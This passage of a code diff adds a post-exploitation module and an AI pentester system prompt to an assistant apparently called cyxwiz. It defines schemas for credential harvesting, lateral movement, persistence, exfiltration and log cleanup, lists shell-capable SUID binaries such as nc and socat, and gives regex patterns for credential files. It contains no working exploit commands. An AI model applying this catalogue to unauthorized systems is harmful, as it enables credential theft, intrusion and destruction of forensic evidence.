+    gtfobins: z.string().optional(), // GTFOBins reference URL
+    lolbas: z.string().optional(), // LOLBAS reference URL
+    mitre: z.array(z.string()), // MITRE ATT&CK techniques
+    notes: z.string().optional(),
+    discoveredAt: z.number(),
+  })
+  export type PrivescVector = z.infer<typeof PrivescVector>
+
+  // ============================================
+  // Lateral Movement Types
+  // ============================================
+
+  /**
+   * Lateral movement methods.
+   */
+  export const LateralMethod = z.enum([
+    "smb",
+    "wmi",
+    "ssh",
+    "rdp",
+    "psremoting",
+    "winrm",
+    "pass_the_hash",
+    "pass_the_ticket",
+    "overpass_the_hash",
+    "dcom",
+    "scheduled_task_remote",
+    "service_remote",
+    "psexec",
+    "wmiexec",
+    "smbexec",
+  ])
+  export type LateralMethod = z.infer<typeof LateralMethod>
+
+  /**
+   * Lateral movement target.
+   */
+  export const LateralTarget = z.object({
+    id: z.string(),
+    ip: z.string(),
+    hostname: z.string().optional(),
+    os: z.string().optional(),
+    domain: z.string().optional(),
+    availableMethods: z.array(LateralMethod).default([]),
+    openPorts: z.array(z.number()).default([]),
+    shares: z.array(z.string()).default([]),
+    services: z.array(z.string()).default([]),
+    reachable: z.boolean().default(true),
+    credentials: z.array(z.string()).default([]), // References to credential IDs
+    discoveredAt: z.number(),
+  })
+  export type LateralTarget = z.infer<typeof LateralTarget>
+
+  /**
+   * Lateral movement path.
+   */
+  export const LateralPath = z.object({
+    id: z.string(),
+    source: z.string(),
+    destination: z.string(),
+    method: LateralMethod,
+    credentials: z.string().optional(), // Credential ID or description
+    credentialType: z.enum(["password", "hash", "ticket", "key"]).optional(),
+    risk: Severity,
+    detectionRisk: DetectionRisk,
+    commands: z.array(z.string()), // Guidance commands
+    prerequisites: z.array(z.string()).default([]),
+    mitre: z.array(z.string()),
+    notes: z.string().optional(),
+    tested: z.boolean().default(false),
+    successful: z.boolean().optional(),
+    discoveredAt: z.number(),
+  })
+  export type LateralPath = z.infer<typeof LateralPath>
+
+  // ============================================
+  // Credential Harvesting Types
+  // ============================================
+
+  /**
+   * Credential types.
+   */
+  export const CredentialType = z.enum([
+    "password",
+    "hash_ntlm",
+    "hash_lm",
+    "hash_sha",
+    "hash_md5",
+    "ssh_key",
+    "kerberos_ticket",
+    "kerberos_keytab",
+    "certificate",
+    "token",
+    "api_key",
+    "browser_password",
+    "wifi_password",
+    "database_credential",
+  ])
+  export type CredentialType = z.infer<typeof CredentialType>
+
+  /**
+   * Credential source categories.
+   */
+  export const CredentialSource = z.enum([
+    // Linux
+    "shadow",
+    "ssh_keys",
+    "history",
+    "config_files",
+    "env_vars",
+    "keyrings",
+    "memory",
+    "process",
+    // Windows
+    "sam",
+    "lsass",
+    "ntds",
+    "dpapi",
+    "registry",
+    "credential_manager",
+    "browser",
+    "kerberos",
+    "vault",
+    "wifi",
+    // Common
+    "files",
+    "database",
+    "application",
+  ])
+  export type CredentialSource = z.infer<typeof CredentialSource>
+
+  /**
+   * Credential location (discovered but not harvested).
+   */
+  export const CredentialLocation = z.object({
+    id: z.string(),
+    source: CredentialSource,
+    platform: Platform,
+    path: z.string(), // File path, registry key, etc.
+    description: z.string(),
+    expectedTypes: z.array(CredentialType).default([]),
+    accessLevel: z.enum(["user", "admin", "system"]),
+    extractionCommands: z.array(z.string()), // Guidance commands
+    tools: z.array(z.string()).default([]), // Recommended tools (mimikatz, secretsdump, etc.)
+    risk: Severity,
+    detectionRisk: DetectionRisk,
+    mitre: z.array(z.string()),
+    notes: z.string().optional(),
+    discovered: z.boolean().default(false),
+    discoveredAt: z.number(),
+  })
+  export type CredentialLocation = z.infer<typeof CredentialLocation>
+
+  /**
+   * Harvested credential.
+   */
+  export const HarvestedCredential = z.object({
+    id: z.string(),
+    type: CredentialType,
+    source: CredentialSource,
+    username: z.string().optional(),
+    domain: z.string().optional(),
+    value: z.string().optional(), // May be redacted
+    valueRedacted: z.boolean().default(true),
+    host: z.string(),
+    path: z.string().optional(),
+    valid: z.boolean().optional(),
+    usableFor: z.array(z.string()).default([]), // Services this cred can access
+    harvestedAt: z.number(),
+    notes: z.string().optional(),
+  })
+  export type HarvestedCredential = z.infer<typeof HarvestedCredential>
+
+  // ============================================
+  // Persistence Types
+  // ============================================
+
+  /**
+   * Linux persistence categories.
+   */
+  export const LinuxPersistenceCategory = z.enum([
+    "cron",
+    "systemd",
+    "init",
+    "shell_profile",
+    "ssh_authorized_keys",
+    "ld_preload",
+    "pam",
+    "at_job",
+    "kernel_module",
+    "rc_local",
+    "motd",
+    "apt_hook",
+  ])
+  export type LinuxPersistenceCategory = z.infer<typeof LinuxPersistenceCategory>
+
+  /**
+   * Windows persistence categories.
+   */
+  export const WindowsPersistenceCategory = z.enum([
+    "registry_run",
+    "registry_services",
+    "scheduled_task",
+    "wmi_subscription",
+    "service",
+    "dll_hijack",
+    "com_hijack",
+    "startup_folder",
+    "logon_script",
+    "bitsadmin",
+    "image_hijack",
+    "accessibility_features",
+    "appinit_dlls",
+    "winlogon",
+  ])
+  export type WindowsPersistenceCategory = z.infer<typeof WindowsPersistenceCategory>
+
+  /**
+   * Combined persistence category.
+   */
+  export const PersistenceCategory = z.union([LinuxPersistenceCategory, WindowsPersistenceCategory])
+  export type PersistenceCategory = z.infer<typeof PersistenceCategory>
+
+  /**
+   * Survival types (what survives).
+   */
+  export const Survival = z.enum(["reboot", "logout", "service_restart"])
+  export type Survival = z.infer<typeof Survival>
+
+  /**
+   * Persistence mechanism.
+   */
+  export const PersistenceMechanism = z.object({
+    id: z.string(),
+    category: PersistenceCategory,
+    platform: Platform,
+    name: z.string(),
+    description: z.string(),
+    location: z.string(), // File path, registry key, etc.
+    privilege: z.enum(["user", "admin", "system"]),
+    survival: Survival,
+    detectionRisk: DetectionRisk,
+    commands: z.array(z.string()), // Setup commands (guidance)
+    cleanup: z.array(z.string()), // Removal commands
+    indicators: z.array(z.string()).default([]), // Detection indicators
+    mitre: z.array(z.string()),
+    notes: z.string().optional(),
+    catalogedAt: z.number(),
+  })
+  export type PersistenceMechanism = z.infer<typeof PersistenceMechanism>
+
+  // ============================================
+  // Data Exfiltration Types
+  // ============================================
+
+  /**
+   * Data sensitivity levels.
+   */
+  export const DataSensitivity = z.enum(["public", "internal", "confidential", "secret", "top_secret"])
+  export type DataSensitivity = z.infer<typeof DataSensitivity>
+
+  /**
+   * Data target types.
+   */
+  export const DataTargetType = z.enum([
+    "pii",
+    "phi",
+    "financial",
+    "credentials",
+    "source_code",
+    "configuration",
+    "database",
+    "documents",
+    "emails",
+    "intellectual_property",
+    "security_data",
+    "backup",
+  ])
+  export type DataTargetType = z.infer<typeof DataTargetType>
+
+  /**
+   * Data target (discovered sensitive data location).
+   */
+  export const DataTarget = z.object({
+    id: z.string(),
+    type: DataTargetType,
+    path: z.string(),
+    host: z.string(),
+    description: z.string(),
+    sensitivity: DataSensitivity,
+    sizeEstimate: z.string().optional(), // Human readable size
+    accessLevel: z.enum(["user", "admin", "system"]),
+    accessible: z.boolean().default(false),
+    patterns: z.array(z.string()).default([]), // Patterns that matched
+    mitre: z.array(z.string()),
+    notes: z.string().optional(),
+    discoveredAt: z.number(),
+  })
+  export type DataTarget = z.infer<typeof DataTarget>
+
+  /**
+   * Exfiltration channel types.
+   */
+  export const ExfilChannelType = z.enum([
+    "dns",
+    "http",
+    "https",
+    "ssh",
+    "smb",
+    "ftp",
+    "sftp",
+    "cloud_storage",
+    "email",
+    "icmp",
+    "custom_protocol",
+    "steganography",
+    "physical",
+  ])
+  export type ExfilChannelType = z.infer<typeof ExfilChannelType>
+
+  /**
+   * Exfiltration channel.
+   */
+  export const ExfilChannel = z.object({
+    id: z.string(),
+    type: ExfilChannelType,
+    name: z.string(),
+    description: z.string(),
+    available: z.boolean().default(false),
+    bandwidth: z.enum(["low", "medium", "high"]),
+    detectionRisk: DetectionRisk,
+    commands: z.array(z.string()), // Guidance commands
+    tools: z.array(z.string()).default([]), // Recommended tools
+    prerequisites: z.array(z.string()).default([]),
+    mitre: z.array(z.string()),
+    notes: z.string().optional(),
+    analyzedAt: z.number(),
+  })
+  export type ExfilChannel = z.infer<typeof ExfilChannel>
+
+  // ============================================
+  // Cleanup/Artifact Types
+  // ============================================
+
+  /**
+   * Artifact types.
+   */
+  export const ArtifactType = z.enum([
+    "file",
+    "registry",
+    "service",
+    "scheduled_task",
+    "user_account",
+    "log_entry",
+    "process",
+    "network_connection",
+    "firewall_rule",
+    "event_log",
+    "prefetch",
+    "shimcache",
+    "amcache",
+    "mft_entry",
+  ])
+  export type ArtifactType = z.infer<typeof ArtifactType>
+
+  /**
+   * Created artifact (for tracking and cleanup).
+   */
+  export const Artifact = z.object({
+    id: z.string(),
+    type: ArtifactType,
+    platform: Platform,
+    path: z.string(), // File path, registry key, service name, etc.
+    description: z.string(),
+    createdBy: z.string(), // Action that created it
+    cleanupCommand: z.string().optional(),
+    cleanupVerification: z.string().optional(), // Command to verify cleanup
+    cleaned: z.boolean().default(false),
+    cleanedAt: z.number().optional(),
+    createdAt: z.number(),
+    notes: z.string().optional(),
+  })
+  export type Artifact = z.infer<typeof Artifact>
+
+  /**
+   * Log cleanup guidance.
+   */
+  export const LogCleanupGuidance = z.object({
+    logType: z.string(),
+    platform: Platform,
+    location: z.string(),
+    description: z.string(),
+    cleanupCommands: z.array(z.string()),
+    risk: DetectionRisk,
+    forensicImpact: z.string(),
+    mitre: z.array(z.string()),
+  })
+  export type LogCleanupGuidance = z.infer<typeof LogCleanupGuidance>
+
+  /**
+   * Cleanup checklist item.
+   */
+  export const CleanupChecklistItem = z.object({
+    id: z.string(),
+    category: z.string(),
+    description: z.string(),
+    commands: z.array(z.string()),
+    verification: z.string().optional(),
+    completed: z.boolean().default(false),
+    priority: z.enum(["critical", "high", "medium", "low"]),
+    notes: z.string().optional(),
+  })
+  export type CleanupChecklistItem = z.infer<typeof CleanupChecklistItem>
+
+  // ============================================
+  // Profile Types
+  // ============================================
+
+  /**
+   * Privesc scan options.
+   */
+  export const PrivescScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    depth: z.enum(["basic", "full", "deep", "passive"]).default("full"),
+    categories: z.array(PrivescCategory).optional(),
+  })
+  export type PrivescScanOptions = z.infer<typeof PrivescScanOptions>
+
+  /**
+   * Lateral scan options.
+   */
+  export const LateralScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    depth: z.enum(["enum", "basic", "full", "deep", "passive"]).default("full"),
+    methods: z.array(LateralMethod).optional(),
+  })
+  export type LateralScanOptions = z.infer<typeof LateralScanOptions>
+
+  /**
+   * Credential scan options.
+   */
+  export const CredsScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    depth: z.enum(["passive", "guided", "deep"]).default("guided"),
+    sources: z.array(CredentialSource).optional(),
+  })
+  export type CredsScanOptions = z.infer<typeof CredsScanOptions>
+
+  /**
+   * Persistence scan options.
+   */
+  export const PersistScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    catalog: z.boolean().default(true),
+    categories: z.array(PersistenceCategory).optional(),
+  })
+  export type PersistScanOptions = z.infer<typeof PersistScanOptions>
+
+  /**
+   * Exfil scan options.
+   */
+  export const ExfilScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    depth: z.enum(["discover", "full", "passive"]).default("full"),
+    dataTypes: z.array(DataTargetType).optional(),
+  })
+  export type ExfilScanOptions = z.infer<typeof ExfilScanOptions>
+
+  /**
+   * Cleanup options.
+   */
+  export const CleanupOptions = z.object({
+    enabled: z.boolean().default(true),
+    trackArtifacts: z.boolean().default(true),
+    generateChecklist: z.boolean().default(true),
+  })
+  export type CleanupOptions = z.infer<typeof CleanupOptions>
+
+  /**
+   * Assessment profile.
+   */
+  export const AssessmentProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    modules: z.object({
+      privesc: PrivescScanOptions,
+      lateral: LateralScanOptions,
+      creds: CredsScanOptions,
+      persist: PersistScanOptions,
+      exfil: ExfilScanOptions,
+      cleanup: CleanupOptions,
+    }),
+    stealth: z.boolean().default(false),
+    timeout: z.number().default(60000),
+    rateLimit: z.number().optional(),
+  })
+  export type AssessmentProfile = z.infer<typeof AssessmentProfile>
+
+  // ============================================
+  // Session Types
+  // ============================================
+
+  /**
+   * Session statistics.
+   */
+  export const SessionStats = z.object({
+    privescVectors: z.number().default(0),
+    lateralTargets: z.number().default(0),
+    lateralPaths: z.number().default(0),
+    credentialLocations: z.number().default(0),
+    harvestedCredentials: z.number().default(0),
+    persistenceOptions: z.number().default(0),
+    dataTargets: z.number().default(0),
+    exfilChannels: z.number().default(0),
+    artifacts: z.number().default(0),
+    cleanupItems: z.number().default(0),
+    duration: z.number().default(0),
+  })
+  export type SessionStats = z.infer<typeof SessionStats>
+
+  /**
+   * Post-exploitation session.
+   */
+  export const PostExploitSession = z.object({
+    id: z.string(),
+    target: z.string(),
+    platform: Platform,
+    currentUser: z.string(),
+    currentPrivilege: z.enum(["user", "admin", "root", "system"]),
+    hostname: z.string().optional(),
+    domain: z.string().optional(),
+    profile: ProfileId,
+    status: Status,
+    privescVectors: z.array(PrivescVector).default([]),
+    lateralTargets: z.array(LateralTarget).default([]),
+    lateralPaths: z.array(LateralPath).default([]),
+    credentialLocations: z.array(CredentialLocation).default([]),
+    credentials: z.array(HarvestedCredential).default([]),
+    persistenceOptions: z.array(PersistenceMechanism).default([]),
+    dataTargets: z.array(DataTarget).default([]),
+    exfilChannels: z.array(ExfilChannel).default([]),
+    artifacts: z.array(Artifact).default([]),
+    cleanupChecklist: z.array(CleanupChecklistItem).default([]),
+    stats: SessionStats,
+    startedAt: z.number(),
+    endedAt: z.number().optional(),
+    error: z.string().optional(),
+  })
+  export type PostExploitSession = z.infer<typeof PostExploitSession>
+
+  // ============================================
+  // Parser Types (LinPEAS/WinPEAS)
+  // ============================================
+
+  /**
+   * LinPEAS section types.
+   */
+  export const LinPEASSection = z.enum([
+    "system_info",
+    "available_software",
+    "processes_cron",
+    "services",
+    "network",
+    "users",
+    "software",
+    "interesting_files",
+    "suid",
+    "capabilities",
+    "sudo",
+    "writable_files",
+    "docker",
+  ])
+  export type LinPEASSection = z.infer<typeof LinPEASSection>
+
+  /**
+   * WinPEAS section types.
+   */
+  export const WinPEASSection = z.enum([
+    "system_info",
+    "users_info",
+    "processes_info",
+    "services_info",
+    "network_info",
+    "windows_creds",
+    "browser_info",
+    "interesting_files",
+    "events_info",
+  ])
+  export type WinPEASSection = z.infer<typeof WinPEASSection>
+
+  /**
+   * Parsed PEAS finding.
+   */
+  export const PEASFinding = z.object({
+    section: z.string(),
+    category: z.string(),
+    title: z.string(),
+    content: z.string(),
+    severity: Severity,
+    privescVector: z.boolean().default(false),
+    raw: z.string().optional(),
+  })
+  export type PEASFinding = z.infer<typeof PEASFinding>
+
+  /**
+   * PEAS parse result.
+   */
+  export const PEASParseResult = z.object({
+    tool: z.enum(["linpeas", "winpeas"]),
+    platform: Platform,
+    sections: z.array(z.string()),
+    findings: z.array(PEASFinding),
+    privescVectors: z.array(PrivescVector).default([]),
+    summary: z.object({
+      total: z.number(),
+      critical: z.number(),
+      high: z.number(),
+      medium: z.number(),
+      low: z.number(),
+    }),
+    parsedAt: z.number(),
+  })
+  export type PEASParseResult = z.infer<typeof PEASParseResult>
+
+  // ============================================
+  // Constants
+  // ============================================
+
+  /**
+   * MITRE ATT&CK technique references for privilege escalation.
+   */
+  export const MITRE_PRIVESC = {
+    SUID: "T1548.001",
+    SETUID_SETGID: "T1548.001", // Alias for SUID
+    SUDO: "T1548.003",
+    SUDO_CACHING: "T1548.003", // Alias for SUDO
+    CAPABILITIES: "T1068",
+    CRON: "T1053.003",
+    KERNEL: "T1068",
+    SERVICE_EXPLOIT: "T1543.003",
+    DLL_HIJACK: "T1574.001",
+    SERVICE_PERMISSIONS: "T1574.010",
+    FILE_PERMISSIONS: "T1574.010", // Alias for SERVICE_PERMISSIONS
+    REGISTRY_RUN_KEYS: "T1547.001",
+    UNQUOTED_PATH: "T1574.009",
+    PATH_INTERCEPTION: "T1574.009", // Alias for UNQUOTED_PATH
+    TOKEN_MANIPULATION: "T1134",
+    UAC_BYPASS: "T1548.002",
+    ALWAYS_INSTALL_ELEVATED: "T1574.007",
+    SCHEDULED_TASK: "T1053.005",
+    ABUSE_ELEVATION: "T1548", // Abuse Elevation Control Mechanism
+    CONTAINER_ESCAPE: "T1611", // Escape to Host
+  } as const
+
+  /**
+   * MITRE ATT&CK technique references for lateral movement.
+   */
+  export const MITRE_LATERAL = {
+    SMB_EXEC: "T1021.002",
+    WMI_EXEC: "T1047",
+    SSH: "T1021.004",
+    RDP: "T1021.001",
+    WINRM: "T1021.006",
+    PASS_THE_HASH: "T1550.002",
+    PASS_THE_TICKET: "T1550.003",
+    DCOM: "T1021.003",
+    PSEXEC: "T1569.002",
+  } as const
+
+  /**
+   * MITRE ATT&CK technique references for credential access.
+   */
+  export const MITRE_CREDS = {
+    OS_CREDENTIAL_DUMPING: "T1003",
+    LSASS_MEMORY: "T1003.001",
+    SAM: "T1003.002",
+    NTDS: "T1003.003",
+    DPAPI: "T1555.004",
+    CREDENTIAL_FILES: "T1552.001",
+    SSH_KEYS: "T1552.004",
+    BROWSER_CREDS: "T1555.003",
+    KERBEROASTING: "T1558.003",
+    ASREP_ROASTING: "T1558.004",
+  } as const
+
+  /**
+   * MITRE ATT&CK technique references for persistence.
+   */
+  export const MITRE_PERSIST = {
+    CRON: "T1053.003",
+    SYSTEMD: "T1543.002",
+    RC_SCRIPTS: "T1037.004",
+    SHELL_PROFILE: "T1546.004",
+    SSH_AUTHORIZED_KEYS: "T1098.004",
+    REGISTRY_RUN: "T1547.001",
+    SCHEDULED_TASK: "T1053.005",
+    WMI_EVENT: "T1546.003",
+    SERVICE: "T1543.003",
+    STARTUP_FOLDER: "T1547.001",
+    LOGON_SCRIPT: "T1037.001",
+  } as const
+
+  /**
+   * MITRE ATT&CK technique references for exfiltration.
+   */
+  export const MITRE_EXFIL = {
+    DNS: "T1048.001",
+    HTTP: "T1048.002",
+    HTTPS: "T1048.002",
+    SSH: "T1048",
+    CLOUD_STORAGE: "T1567.002",
+    DATA_COMPRESSED: "T1560",
+    DATA_ENCRYPTED: "T1022",
+  } as const
+
+  /**
+   * MITRE ATT&CK technique references for defense evasion.
+   */
+  export const MITRE_EVASION = {
+    INDICATOR_REMOVAL: "T1070",
+    CLEAR_WINDOWS_LOGS: "T1070.001",
+    CLEAR_LINUX_LOGS: "T1070.002",
+    FILE_DELETION: "T1070.004",
+    TIMESTOMP: "T1070.006",
+  } as const
+
+  /**
+   * GTFOBins categories for SUID binaries.
+   */
+  export const GTFOBINS_CATEGORIES = [
+    "shell",
+    "command",
+    "reverse-shell",
+    "non-interactive-reverse-shell",
+    "bind-shell",
+    "non-interactive-bind-shell",
+    "file-upload",
+    "file-download",
+    "file-write",
+    "file-read",
+    "library-load",
+    "suid",
+    "sudo",
+    "capabilities",
+    "limited-suid",
+  ] as const
+
+  /**
+   * Common SUID binaries with known privesc potential.
+   */
+  export const KNOWN_SUID_PRIVESC = [
+    "bash",
+    "sh",
+    "dash",
+    "ksh",
+    "zsh",
+    "csh",
+    "python",
+    "python2",
+    "python3",
+    "perl",
+    "ruby",
+    "php",
+    "node",
+    "vim",
+    "vi",
+    "nano",
+    "less",
+    "more",
+    "find",
+    "nmap",
+    "awk",
+    "gawk",
+    "sed",
+    "ed",
+    "cp",
+    "mv",
+    "tar",
+    "zip",
+    "rsync",
+    "git",
+    "env",
+    "time",
+    "timeout",
+    "watch",
+    "strace",
+    "ltrace",
+    "tcpdump",
+    "tee",
+    "dd",
+    "openssl",
+    "wget",
+    "curl",
+    "nc",
+    "netcat",
+    "socat",
+    "ssh",
+    "ftp",
+    "scp",
+    "docker",
+    "lxc",
+    "systemctl",
+    "journalctl",
+    "dmesg",
+    "mount",
+    "umount",
+  ] as const
+
+  /**
+   * Common Windows services that can be exploited.
+   */
+  export const EXPLOITABLE_WINDOWS_SERVICES = [
+    "spooler",
+    "wuauserv",
+    "bits",
+    "msiserver",
+    "trustedinstaller",
+    "wscsvc",
+    "seclogon",
+  ] as const
+
+  /**
+   * Sensitive file patterns for discovery.
+   */
+  export const SENSITIVE_FILE_PATTERNS = {
+    credentials: [
+      /password/i,
+      /credential/i,
+      /secret/i,
+      /\.env$/,
+      /\.htpasswd/i,
+      /config\.php/i,
+      /wp-config\.php/i,
+      /web\.config/i,
+      /\.aws\/credentials/i,
+      /\.ssh\/id_/i,
+      /\.gnupg/i,
+      /\.kdbx?$/i, // KeePass
+    ],
+    databases: [/\.sql$/i, /\.sqlite$/i, /\.db$/i, /\.mdb$/i, /\.accdb$/i],
+    backups: [/\.bak$/i, /\.backup$/i, /\.old$/i, /\.tar\.gz$/i, /\.zip$/i],
+    logs: [/\.log$/i, /access\.log/i, /error\.log/i, /auth\.log/i],
+  } as const
+}
diff --git a/packages/opencode/src/pentest/prompt/pentest.txt b/packages/opencode/src/pentest/prompt/pentest.txt
new file mode 100644
index 00000000000..c62bd6e6e1f
--- /dev/null
+++ b/packages/opencode/src/pentest/prompt/pentest.txt
@@ -0,0 +1,141 @@
+You are a skilled penetration tester and security researcher integrated into the cyxwiz AI assistant.
+
+## Your Expertise
+
+You specialize in:
+- **Network Security Testing**: Port scanning, service enumeration, network mapping
+- **Web Application Security**: Vulnerability scanning, directory enumeration, SQL injection
+- **Infrastructure Assessment**: SMB enumeration, SSL/TLS analysis, DNS reconnaissance
+- **Vulnerability Research**: CVE lookup, exploit identification, security analysis
+- **Remediation Guidance**: Providing actionable recommendations to fix issues
+
+## Available Tools
+
+### Dedicated Security Tools
+- `nmap`: Network port scanner with service detection and XML output parsing
+- `sectools`: Wrapper for common security tools (nikto, gobuster, sqlmap, etc.)
+
+### Tool Categories (via sectools or bash)
+
+**Network Reconnaissance:**
+- nmap - Network port scanner
+- masscan - Fast network scanner
+- netcat (nc) - Network utility
+- ping, traceroute - Network diagnostics
+
+**Web Scanning:**
+- nikto - Web server vulnerability scanner
+- dirb, gobuster, ffuf - Directory/file brute forcing
+- wpscan - WordPress security scanner
+- whatweb - Web fingerprinting
+- wafw00f - WAF detection
+
+**Vulnerability Scanning:**
+- nuclei - Template-based vulnerability scanner
+- searchsploit - Exploit database search
+
+**SQL Injection:**
+- sqlmap - Automated SQL injection tool
+
+**SMB/Windows:**
+- enum4linux - SMB enumeration
+- smbclient - SMB/CIFS client
+- crackmapexec - Network attack tool
+- rpcclient - Windows RPC client
+
+**SSL/TLS:**
+- sslscan, sslyze, testssl - SSL/TLS analysis
+
+**DNS:**
+- dnsenum, dnsrecon, fierce - DNS enumeration
+- dig, host, whois - DNS utilities
+
+## Guidelines
+
+### Scope Awareness
+- **ALWAYS** verify that targets are within the authorized scope before scanning
+- Governance policies will enforce scope restrictions automatically
+- If a scan is blocked, explain why and ask for authorized targets
+
+### Tool Selection
+Choose the right tool for the job:
+- Quick port scan → `nmap` with default settings
+- Detailed service scan → `nmap` with `-sV`
+- Web server analysis → `nikto` via `sectools`
+- Directory enumeration → `gobuster` or `dirb` via `sectools`
+- SSL/TLS assessment → `sslscan` or `sslyze` via `sectools`
+- SMB enumeration → `enum4linux` via `sectools`
+
+### Responsible Scanning
+- Start with non-intrusive scans before aggressive techniques
+- Use appropriate timing to avoid overwhelming targets
+- Consider the impact of scans on production systems
+- Document all findings clearly
+
+### Security Analysis
+When analyzing results:
+1. Identify all open ports and their services
+2. Note any outdated or vulnerable service versions
+3. Highlight common security issues (e.g., deprecated protocols, exposed services)
+4. Provide severity ratings based on risk
+5. Offer specific remediation steps
+
+### Communication Style
+- Be clear and concise in your explanations
+- Use technical terminology but explain it when needed
+- Prioritize findings by severity
+- Always include actionable remediation advice
+
+## Example Workflows
+
+### Basic Network Scan
+```
+1. Use nmap tool for port scanning
+2. Analyze open ports and services
+3. Generate findings report
+```
+
+### Web Application Assessment
+```
+1. Use whatweb for fingerprinting
+2. Use nikto for vulnerability scanning
+3. Use gobuster for directory enumeration
+4. Analyze results and prioritize findings
+```
+
+### Infrastructure Security Check
+```
+1. Use nmap for service discovery
+2. Use sslscan for TLS configuration
+3. Use enum4linux for SMB (if Windows/Samba)
+4. Compile comprehensive findings
+```
+
+## Output Format
+
+When reporting scan results, structure your response as:
+
+```
+## Scan Summary
+Brief overview of what was scanned and high-level findings
+
+## Detailed Findings
+For each significant finding:
+- Service/Port
+- Risk Level (Critical/High/Medium/Low/Info)
+- Description
+- Evidence
+- Remediation
+
+## Recommendations
+Prioritized list of actions to improve security
+```
+
+## Important Notes
+
+1. **Password Cracking Tools Restricted**: hydra, hashcat, and john are blocked by default for safety
+2. **Governance Integration**: All network targets are validated against governance scope
+3. **Finding Storage**: Significant findings are automatically stored for later review
+4. **Tool Availability**: Not all tools may be installed on every system
+
+Remember: Your goal is to help users understand their security posture and improve it. Always act ethically and within authorized boundaries.
diff --git a/packages/opencode/src/pentest/report-tool.ts b/packages/opencode/src/pentest/report-tool.ts
new file mode 100644
index 00000000000..d6db4d77eff
--- /dev/null
+++ b/packages/opencode/src/pentest/report-tool.ts
@@ -0,0 +1,215 @@
+/**
+ * @fileoverview Report Generation Tool
+ *
+ * Provides a tool interface for generating security assessment reports.
+ *
+ * @module pentest/report-tool
+ */
+
+import z from "zod"
+import { Tool } from "../tool/tool"
+import { Log } from "../util/log"
+import { Reports, ReportFormat, ReportType } from "./reports"
+
+const log = Log.create({ service: "pentest.report-tool" })
+
+/**
+ * Report generation tool for pentest operations.
+ *
+ * Generates security assessment reports in various formats
+ * from findings collected during pentesting sessions.
+ */
+export const ReportTool = Tool.define("report", async () => {
+  return {
+    description: `Generate security assessment reports from findings.
+
+Supported report types:
+- executive: High-level summary for management
+- technical: Detailed report with evidence and remediation
+- compliance: Formatted for compliance requirements
+- full: Complete report with all data
+
+Supported formats:
+- markdown: Markdown format (default)
+- html: HTML with styling and charts
+- json: Raw JSON data
+
+EXAMPLES:
+- Generate executive summary: type="executive", format="html"
+- Full technical report: type="technical", format="markdown"
+- Export findings as JSON: format="json"
+
+The report will include:
+- Executive summary with risk assessment
+- Severity statistics and charts
+- Detailed findings with evidence
+- Remediation recommendations
+- Optional: raw scan data`,
+
+    parameters: z.object({
+      title: z
+        .string()
+        .optional()
+        .describe("Report title. Default: 'Security Assessment Report'"),
+      type: z
+        .enum(["executive", "technical", "compliance", "full"])
+        .optional()
+        .default("technical")
+        .describe("Report type/style. Default: technical"),
+      format: z
+        .enum(["markdown", "html", "json"])
+        .optional()
+        .default("markdown")
+        .describe("Output format. Default: markdown"),
+      organization: z
+        .string()
+        .optional()
+        .describe("Organization/client name for the report"),
+      assessor: z
+        .string()
+        .optional()
+        .describe("Assessor/tester name"),
+      minSeverity: z
+        .enum(["critical", "high", "medium", "low", "info"])
+        .optional()
+        .describe("Minimum severity to include. Filters out lower severity findings."),
+      includeRawData: z
+        .boolean()
+        .optional()
+        .default(false)
+        .describe("Include raw scan data in appendix. Default: false"),
+      outputFile: z
+        .string()
+        .optional()
+        .describe("Optional file path to save the report"),
+    }),
+
+    async execute(params, ctx) {
+      const startTime = Date.now()
+
+      log.info("Generating report", {
+        type: params.type,
+        format: params.format,
+        sessionID: ctx.sessionID,
+      })
+
+      // Build report configuration
+      const config: Parameters<typeof Reports.generate>[0] = {
+        title: params.title || "Security Assessment Report",
+        type: params.type as ReportType,
+        format: params.format as ReportFormat,
+        organization: params.organization,
+        assessor: params.assessor,
+        includeRawData: params.includeRawData,
+        includeExecutiveSummary: true,
+        includeRemediation: true,
+        includeMethodology: params.type !== "executive",
+        includeCharts: params.format === "html",
+      }
+
+      // Add severity filter if specified
+      if (params.minSeverity) {
+        config.severityFilter = {
+          minSeverity: params.minSeverity,
+        }
+      }
+
+      // Update metadata
+      ctx.metadata({
+        title: `Generating ${params.type} report`,
+        metadata: {
+          type: params.type,
+          format: params.format,
+          status: "generating",
+        },
+      })
+
+      try {
+        // Generate the report
+        const report = await Reports.generate(config, {
+          sessionID: ctx.sessionID,
+          storage: "file",
+        })
+
+        const duration = Date.now() - startTime
+
+        // Save to file if requested
+        if (params.outputFile) {
+          await Bun.write(params.outputFile, report.content)
+          log.info("Report saved to file", { path: params.outputFile })
+        }
+
+        log.info("Report generated", {
+          reportId: report.id,
+          findings: report.stats.findings,
+          duration,
+        })
+
+        // Build output message
+        let output = ""
+
+        if (params.outputFile) {
+          output += `Report saved to: ${params.outputFile}\n\n`
+        }
+
+        output += `Report ID: ${report.id}\n`
+        output += `Format: ${report.format}\n`
+        output += `Findings: ${report.stats.findings}\n`
+        output += `\nSeverity Breakdown:\n`
+        output += `  Critical: ${report.stats.severity.critical}\n`
+        output += `  High: ${report.stats.severity.high}\n`
+        output += `  Medium: ${report.stats.severity.medium}\n`
+        output += `  Low: ${report.stats.severity.low}\n`
+        output += `  Info: ${report.stats.severity.info}\n`
+
+        // Include report content for markdown/json (truncated for large reports)
+        if (params.format !== "html" || !params.outputFile) {
+          output += "\n" + "=".repeat(50) + "\n"
+          output += "REPORT CONTENT\n"
+          output += "=".repeat(50) + "\n\n"
+
+          if (report.content.length > 50000) {
+            output += report.content.slice(0, 50000)
+            output += "\n\n... [Report truncated. Full report saved to file.]\n"
+          } else {
+            output += report.content
+          }
+        } else {
+          output += "\n[HTML report saved to file. Open in browser to view.]\n"
+        }
+
+        return {
+          title: `Report generated (${report.stats.findings} findings)`,
+          output,
+          metadata: {
+            reportId: report.id,
+            type: params.type,
+            format: params.format,
+            findings: report.stats.findings,
+            severity: { ...report.stats.severity, total: report.stats.findings },
+            outputFile: params.outputFile,
+            status: "completed",
+          } as Record<string, unknown>,
+        }
+      } catch (err) {
+        const error = err instanceof Error ? err.message : String(err)
+        log.error("Report generation failed", { error })
+
+        return {
